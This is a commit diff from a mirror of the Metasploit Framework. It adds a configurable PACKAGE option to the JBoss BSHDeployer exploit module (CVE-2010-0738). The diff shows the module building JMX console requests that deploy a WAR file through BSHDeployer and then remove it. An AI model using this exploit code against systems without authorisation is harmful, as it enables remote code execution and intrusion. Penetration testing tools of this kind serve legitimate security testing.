infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixes #3387, add the PACKAGE option to allow 3.2 

git-svn-id: file:///home/svn/framework3/trunk@11518 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2011-01-08 04:11:01 +00:00
parent d994f595fe
commit 9ef757bf17
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/multi/http/jboss_bshdeployer.rb
View File

@ -61,6 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
OptString.new('PATH', [ true, 'The URI path of the JMX console', '/jmx-console' ]),
OptString.new('VERB', [ true, 'The HTTP verb to use (for CVE-2010-0738)', 'POST' ]),
OptString.new('PACKAGE', [ true, 'The package containing the BSHDeployer service', 'deployer' ])
], self.class)
end
@ -71,6 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
jsp_name = datastore['JSP'] || rand_text_alphanumeric(8+rand(8))
app_base = datastore['APPBASE'] || rand_text_alphanumeric(8+rand(8))
pkg = datastore['PACKAGE']
verb = datastore['VERB']
if (verb != 'GET' and verb != 'POST')
@ -121,7 +123,7 @@ EOT
# UPLOAD
#
print_status("Creating exploded WAR in deploy/#{app_base}.war/ dir via BSHDeployer")
res = invoke_bshscript(bsh_script, verb)
res = invoke_bshscript(bsh_script, pkg, verb)
if !res
raise RuntimeError, "Unable to deploy WAR [No Response]"
end
@ -180,7 +182,7 @@ new File(jboss_home + "/deploy/#{app_base + '.war'}").delete();
EOT
print_status("Undeploying #{uri} by deleting the WAR file via BSHDeployer...")
res = invoke_bshscript(bsh_script, verb)
res = invoke_bshscript(bsh_script, pkg, verb)
if !res
print_error("WARNING: Unable to remove WAR [No Response]")
end
@ -219,9 +221,9 @@ EOT
# Invokes +bsh_script+ on the JBoss AS via BSHDeployer
def invoke_bshscript(bsh_script, verb)
def invoke_bshscript(bsh_script, pkg, verb)
params = 'action=invokeOpByName'
params << '&name=jboss.deployer:service=BSHDeployer'
params << '&name=' + pkg + ':service=BSHDeployer'
params << '&methodName=createScriptDeployment'
params << '&argType=java.lang.String'
params << '&arg0=' + Rex::Text.uri_encode(bsh_script)